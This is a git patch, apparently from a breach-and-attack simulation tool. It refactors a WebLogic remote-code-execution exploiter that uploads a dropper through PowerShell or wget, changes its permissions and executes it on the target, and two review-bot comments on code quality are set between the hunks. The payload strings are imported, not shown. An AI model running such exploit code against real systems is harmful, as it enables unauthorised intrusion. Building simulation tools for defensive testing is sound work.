From 10528c313dfad0fa8fe26e17edff0ab663670da9 Mon Sep 17 00:00:00 2001
From: Vakaris
Date: Fri, 17 Aug 2018 13:46:14 +0300
Subject: [PATCH] Webblogic refactored to web RCE framework changes(from static methods into class methods)
---
 infection_monkey/exploit/weblogic.py | 28 ++++++++++------------------
 1 file changed, 10 insertions(+), 18 deletions(-)
diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py
index 524d9a005..c2b6e81a9 100644
--- a/infection_monkey/exploit/weblogic.py
+++ b/infection_monkey/exploit/weblogic.py
@@ -10,7 +10,7 @@ from requests import post, exceptions
 from web_rce import WebRCE
 from exploit.tools import get_free_tcp_port, get_interface_to_target
 from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
-from model import POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, WGET_HTTP_UPLOAD
+from model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD
 import threading
 import logging
@@ -46,17 +46,17 @@ class WebLogicExploiter(WebRCE):
 _TARGET_OS_TYPE = ['linux', 'windows']
 def __init__(self, host):
- super(WebLogicExploiter, self).__init__(host)
+ super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
+ 'win32': 'monkey-32.exe',
+ 'win64': 'monkey-64.exe'})
 def exploit_host(self):
 # Get open ports
- ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"])
+ ports = self.get_ports_w(self.HTTP, ["http"])
 if not ports:
 return False
 # Get urls to try to exploit
- urls = WebRCE.build_potential_urls(self.host, ports, URLS)
-
- exploiter = self.exploit
+ urls = self.build_potential_urls(ports, URLS)
 # Checking takes a lot of time, so we check until we get exploitable url and stop
 vulnerable_urls = []
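Review bot: The path dict passed to the base-class constructor in `__init__` carries no comment, and its Linux entry `'/tmp/monkey.sh'` differs from the `'./monkey.sh'` that the last hunk removes together with the remark "Somehow we can't save files outside server's directory". If that restriction still applies, the new Linux value no longer matches it, and in either case the reason for the bare Windows file names is now undocumented. I would carry the remark over above the `super(...)` call, for example `# Relative names: files cannot be saved outside the server's directory`, and confirm the Linux entry against it. The keys `'win32'`/`'win64'` here also differ from the `'windows'` key passed to `upload_monkey` in the last hunk, which deserves a line in the docstring if the base class (not visible here) really expects both vocabularies.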
@@ -69,24 +69,16 @@ class WebLogicExploiter(WebRCE):
 if not vulnerable_urls:
 return False
- # Somehow we can't save files outside server's directory
- config = copy.deepcopy(self._config)
- config.dropper_target_path_win_32 = 'monkey-32.exe'
- config.dropper_target_path_win_64 = 'monkey-64.exe'
- config.dropper_target_path_linux = './monkey.sh'
-
- data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0],
- {'windows': POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED,
- 'linux': WGET_HTTP_UPLOAD})
+ data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
 # We can't use 'if not' because response may be ''
- if not data or data['response'] == False:
+ if not data or data['response'] is False:
 return False
- if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
+ if self.change_permissions(vulnerable_urls[0], data['path']) is False:
 return False
- if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], False) == False:
+ if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
 return False
 return True
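Review bot: The three `is False` checks count only the literal `False` as failure, so a helper that returns `None` or `0` on error would be read as success and `exploit_host` would go on to `return True`. The existing comment explains why an empty string must pass for `data['response']`, but nothing states the same contract for `change_permissions` and `execute_remote_monkey`, whose definitions are outside this diff. If those two return only `True`/`False`, `if not self.change_permissions(vulnerable_urls[0], data['path']):` is the safer form; otherwise add a comment such as `# returns the response text on success, False on failure` above each check. `exploit_host` begins in the previous hunk and part of its body lies between the hunks.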